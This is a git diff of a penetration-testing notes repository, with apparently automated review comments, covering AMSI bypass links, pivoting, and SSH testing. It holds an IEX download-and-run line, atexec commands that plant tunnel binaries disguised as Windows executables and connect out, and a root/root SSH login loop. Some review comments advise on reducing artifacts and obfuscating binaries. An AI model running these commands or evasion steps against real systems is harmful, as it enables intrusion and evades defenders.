diff --git a/SUMMARY.md b/SUMMARY.md index 67fbac8..2406d17 100644 --- a/SUMMARY.md +++ b/SUMMARY.md @@ -96,6 +96,7 @@ - [DevOps](pentest/infrastructure/devops/README.md) * [Ansible](pentest/infrastructure/devops/ansible.md) * [Artifactory](pentest/infrastructure/devops/artifactory.md) + * [Atlassian](pentest/infrastructure/devops/atlassian.md) * [Containerization / Orchestration](pentest/infrastructure/devops/containerization-orchestration.md) * [GitLab](pentest/infrastructure/devops/gitlab.md) * [Jenkis](pentest/infrastructure/devops/jenkins.md) diff --git a/pentest/infrastructure/ad/av-edr-evasion/amsi-bypass.md b/pentest/infrastructure/ad/av-edr-evasion/amsi-bypass.md index c9b33b7..dc8f00a 100644 --- a/pentest/infrastructure/ad/av-edr-evasion/amsi-bypass.md +++ b/pentest/infrastructure/ad/av-edr-evasion/amsi-bypass.md @@ -13,10 +13,6 @@ description: Antimalware Scan Interface * [https://pentestlaboratories.com/2021/05/17/amsi-bypass-methods/](https://pentestlaboratories.com/2021/05/17/amsi-bypass-methods/) * [https://iwantmore.pizza/posts/amsi.html](https://iwantmore.pizza/posts/amsi.html) * [https://github.com/BC-SECURITY/Beginners-Guide-to-Obfuscation](https://github.com/BC-SECURITY/Beginners-Guide-to-Obfuscation) -* [https://ethicalchaos.dev/2022/04/17/in-process-patchless-amsi-bypass/](https://ethicalchaos.dev/2022/04/17/in-process-patchless-amsi-bypass/) -* [https://github.com/Mr-Un1k0d3r/AMSI-ETW-Patch](https://github.com/Mr-Un1k0d3r/AMSI-ETW-Patch) -* [https://www.blazeinfosec.com/post/tearing-amsi-with-3-bytes/](https://www.blazeinfosec.com/post/tearing-amsi-with-3-bytes/) -* [https://github.com/ZeroMemoryEx/Amsi-Killer/blob/master/README.md](https://github.com/ZeroMemoryEx/Amsi-Killer/blob/master/README.md) AMSI Test [Sample](https://gist.github.com/rasta-mouse/5cdf25b7d3daca5536773fdf998f2f08): 
@@ -27,17 +23,7 @@ PS > Invoke-Expression "AMSI Test Sample: 7e72c3ce-861b-4339-8740-0ac1484c1386" -## PowerShell - - - -### Evil-WinRM + IEX - -``` -*Evil-WinRM* PS > menu -*Evil-WinRM* PS > Bypass-4MSI -*Evil-WinRM* PS > IEX([Net.Webclient]::new().DownloadString("http://127.0.0.1/PowerView.ps1")) -``` +## Break the Logic @@ -84,6 +70,15 @@ $A="5492868772801748688168747280728187173688878280688776";$B="828117368086765687 + +## Memory Patching + +- [https://github.com/Mr-Un1k0d3r/AMSI-ETW-Patch](https://github.com/Mr-Un1k0d3r/AMSI-ETW-Patch) +- [https://www.blazeinfosec.com/post/tearing-amsi-with-3-bytes/](https://www.blazeinfosec.com/post/tearing-amsi-with-3-bytes/) +- [https://github.com/ZeroMemoryEx/Amsi-Killer](https://github.com/ZeroMemoryEx/Amsi-Killer) + + + ### Patch AmsiScanBuffer * [https://rastamouse.me/memory-patching-amsi-bypass/](https://rastamouse.me/memory-patching-amsi-bypass/) @@ -276,7 +271,9 @@ foreach ($p in $providers) { Get-ItemProperty "HKLM:\SOFTWARE\Classes\CLSID\$p\I -## Jscript +## Registry & Filesystem + +{% embed url="https://twitter.com/eversinc33/status/1666121784192581633" %} 
@@ -328,3 +325,21 @@ try { ... ``` {% endcode %} + + + + +## Hardware Breakpoints (Fileless Bypass) + +- [https://ethicalchaos.dev/2022/04/17/in-process-patchless-amsi-bypass/](https://ethicalchaos.dev/2022/04/17/in-process-patchless-amsi-bypass/) +- [https://gist.github.com/CCob/fe3b63d80890fafeca982f76c8a3efdf](https://gist.github.com/CCob/fe3b63d80890fafeca982f76c8a3efdf) +- [https://gist.github.com/susMdT/360c64c842583f8732cc1c98a60bfd9e](https://gist.github.com/susMdT/360c64c842583f8732cc1c98a60bfd9e) + + + + +## Hook NtCreateSection + +- [https://waawaa.github.io/es/amsi_bypass-hooking-NtCreateSection/](https://waawaa.github.io/es/amsi_bypass-hooking-NtCreateSection/) +- [https://s3cur3th1ssh1t.github.io/Cat_Mouse_or_Chess/](https://s3cur3th1ssh1t.github.io/Cat_Mouse_or_Chess/) +- [https://github.com/S3cur3Th1sSh1t/Ruy-Lopez](https://github.com/S3cur3Th1sSh1t/Ruy-Lopez) diff --git a/pentest/infrastructure/devops/atlassian.md b/pentest/infrastructure/devops/atlassian.md new file mode 100644 index 0000000..7b2511d --- /dev/null +++ b/pentest/infrastructure/devops/atlassian.md @@ -0,0 +1,8 @@ +# Atlassian + + + + +## Jira + +- [https://github.com/UGF0aWVudF9aZXJv/Atlassian-Jira-pentesting](https://github.com/UGF0aWVudF9aZXJv/Atlassian-Jira-pentesting) diff --git a/pentest/infrastructure/lpe.md b/pentest/infrastructure/lpe.md index 7cc8ae9..373d398 100644 --- a/pentest/infrastructure/lpe.md +++ b/pentest/infrastructure/lpe.md @@ -31,6 +31,7 @@ PS > Set-PSReadlineOption -HistorySaveStyle SaveNothing ``` PS > whoami == dir env: PS > whoami /groups == ([System.Security.Principal.WindowsIdentity]("$env:USERNAME")).Groups | % { $_.Translate([Security.Principal.NTAccount]) } | select -ExpandProperty value +PS > (New-Object Security.Principal.WindowsPrincipal([Security.Principal.WindowsIdentity]::GetCurrent())).IsInRole([Security.Principal.WindowsBuiltInRole]::Administrator) ``` 
diff --git a/pentest/infrastructure/pivoting.md b/pentest/infrastructure/pivoting.md index e9ab27e..c07f663 100644 --- a/pentest/infrastructure/pivoting.md +++ b/pentest/infrastructure/pivoting.md @@ -379,9 +379,9 @@ alice@victim:~$ nohup ./chisel client [--fingerprint ] [--auth sn Quicky: ``` -$ atexec.py -nooutput megacorp.local/snovvcrash@192.168.1.11 'start "" /b C:\Windows\tracerpt.exe server -p 8000 --socks5 --auth snovvcrash:"Passw0rd!"' +$ atexec.py megacorp.local/snovvcrash@192.168.1.11 'start "" /b C:\Windows\tracerpt.exe server -p 8000 --socks5 --auth snovvcrash:"Passw0rd!"' $ sudo chisel client -v --auth snovvcrash:'Passw0rd!' 192.168.1.11:8000 127.0.0.1:1080:socks -$ atexec.py -nooutput megacorp.local/snovvcrash@192.168.1.11 'taskkill /IM:tracerpt.exe /F && del C:\Windows\tracerpt.exe' +$ atexec.py megacorp.local/snovvcrash@192.168.1.11 'taskkill /IM:tracerpt.exe /F && del C:\Windows\tracerpt.exe' ``` @@ -425,15 +425,16 @@ alice@victim:~$ ./revsocks -connect 10.14.14.3:8000 -pass 'Passw0rd!' - [https://github.com/llkat/rsockstun](https://github.com/llkat/rsockstun) -{% content-ref url="/redteam/maldev/golang.md#garble" %} -[golang.md](golang.md) -{% endcontent-ref %} - ``` $ openssl req -new -x509 -keyout cert.key -out cert.crt -days 365 -nodes $ sudo rsockstun -listen :8000 -socks 127.0.0.1:1080 -cert cert -pass 'Passw0rd!' -$ atexec.py -nooutput megacorp.local/snovvcrash@192.168.1.11 'start "" /b C:\Windows\WerFault.exe -connect 10.10.13.37:8000 -pass "Passw0rd!"' -$ atexec.py -nooutput megacorp.local/snovvcrash@192.168.1.11 'taskkill /IM:WerFault.exe /F && del C:\Windows\WerFault.exe' +``` + +Quicky: + +``` +$ atexec.py megacorp.local/snovvcrash@192.168.1.11 'start "" /b C:\Windows\WerFault.exe -connect 10.10.13.37:8000 -pass "Passw0rd!"' +$ atexec.py megacorp.local/snovvcrash@192.168.1.11 'taskkill /IM:WerFault.exe /F && del C:\Windows\WerFault.exe' ``` diff --git a/pentest/perimeter/ssh.md b/pentest/perimeter/ssh.md index fda14c3..adf1fd2 100644 
--- a/pentest/perimeter/ssh.md +++ b/pentest/perimeter/ssh.md @@ -11,6 +11,14 @@ description: Secure Shell - [https://github.com/mcorybillington/sshspray](https://github.com/mcorybillington/sshspray) +A list of targets with different SSH ports: + +``` +$ das parse ssh -raw | cut -c 7- | awk -F: '{print $1}' > ssh_hosts +$ das parse ssh -raw | cut -c 7- | awk -F: '{print $2}' > ssh_ports +$ paste ssh_hosts ssh_ports | while read host port; do cme ssh $host -u root -p root --port $port; done +``` + Password spray with a private key and passphrase `Passw0rd!` using CME: ```
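Review bot: in SUMMARY.md, the unchanged context line directly below the new Atlassian entry still reads `* [Jenkis](pentest/infrastructure/devops/jenkins.md)`; since this hunk already touches the DevOps list, fix the link text to `Jenkins` in the same commit (the target path is spelled correctly, so only the label changes).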
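Review bot: in amsi-bypass.md, hunk `@@ -27,17 +23,7 @@`, the `### Evil-WinRM + IEX` block (`menu` / `Bypass-4MSI` / `IEX([Net.Webclient]::new().DownloadString(...))`) is deleted outright rather than relocated, while every reference link removed elsewhere in this commit is re-homed under a new section. If the intent is only to retire the `## PowerShell` heading, keep the three-line snippet under `## Break the Logic` or another section; if Evil-WinRM's built-in bypass is being dropped on purpose, say why in the commit message.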
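Review bot: in amsi-bypass.md, hunk `@@ -84,6 +70,15 @@`, the new `## Memory Patching` list uses `-` bullets (`+- [https://github.com/Mr-Un1k0d3r/AMSI-ETW-Patch]`) whereas the reference list at the top of the same file, visible in hunk `@@ -13,10 +13,6 @@`, uses `*` bullets; pick one marker for the file. The two added blank lines before the heading and three after the list can also be trimmed to a single blank line on each side.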
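Review bot: in amsi-bypass.md, hunk `@@ -276,7 +271,9 @@`, renaming `## Jscript` to `## Registry & Filesystem` changes the generated anchor, so any inbound `#jscript` links break; grep the repo for them before merging. Also check that the JScript-specific material that previously sat under this heading still belongs under a registry/filesystem title, and give the `{% embed url="https://twitter.com/eversinc33/..." %}` a one-sentence summary so the section still makes sense if the tweet disappears.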
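Review bot: in amsi-bypass.md, hunk `@@ -328,3 +325,21 @@`, the heading `## Hardware Breakpoints (Fileless Bypass)` mislabels the technique: the post it links is titled `in-process-patchless-amsi-bypass`, and what distinguishes the debug-register approach is that it never modifies `amsi.dll` code pages (patchless), not that it avoids disk (fileless), which is equally true of the `## Memory Patching` section above. Rename to `Hardware Breakpoints (Patchless Bypass)`. The four consecutive blank `+` lines before each of the two new headings can be reduced to one.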
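Review bot: in lpe.md, the added `IsInRole([Security.Principal.WindowsBuiltInRole]::Administrator)` line is not equivalent to the `whoami /groups` check directly above it: under UAC, a member of the local Administrators group running an unelevated (medium-integrity) process gets `False`, because the filtered token carries the Administrators SID as deny-only, and the call returns `True` only for an elevated token. Add a comment such as `# is the current process elevated?` so readers do not conclude they lack admin rights when they merely need to elevate.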
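Review bot: in pivoting.md, hunk `@@ -379,9 +379,9 @@`, dropping `-nooutput` changes how atexec.py runs the command: without the flag it wraps the command as `cmd.exe /C <command> > %windir%\Temp\<random>.tmp 2>&1`, then reads and deletes that file over the ADMIN$ share. The chisel server launched with `start "" /b` inherits the redirected stdout handle, so its log output lands in that temp file, which may stay open for the lifetime of the server, leaving an artifact under `C:\Windows\Temp` and a failed cleanup. Keep `-nooutput` on the `start "" /b C:\Windows\tracerpt.exe server ...` line and drop it only on the `taskkill` line, where seeing the output is actually useful; if the removal was deliberate, note the reason in the commit message.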
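Review bot: in pivoting.md, hunk `@@ -425,15 +425,16 @@`, the `{% content-ref url="/redteam/maldev/golang.md#garble" %}` pointer is deleted with nothing replacing it, so readers lose the hint that the rsockstun binary dropped as `C:\Windows\WerFault.exe` should be built through garble first. If it was removed because the pair was inconsistent (`url` pointing at `/redteam/maldev/golang.md` while the label reads `golang.md`), fix the reference instead of deleting it and keep it above the `openssl req` block. Splitting the two atexec lines into their own `Quicky:` block matches the chisel section, but the same `-nooutput` concern raised for the chisel hunk applies to the `start "" /b C:\Windows\WerFault.exe -connect ...` line here.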
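Review bot: in ssh.md, the added target-list recipe runs `das parse ssh -raw` twice and writes two files that `paste` re-joins, so host and port are paired correctly only if both invocations return the same rows in the same order. One pass keeps each pair together: `das parse ssh -raw | cut -c 7- | awk -F: '{print $1, $2}' | while read host port; do cme ssh "$host" --port "$port" -u root -p root; done`. `cut -c 7-` also hard-codes a six-character prefix of the raw output; a field split such as `awk -F'[/:]+' '{print $(NF-1), $NF}'` survives a change in that prefix. Quote `$host` and `$port` in the loop, and make the intro sentence say that `-u root -p root` is a single default-credential check rather than the spray described in the paragraph that follows.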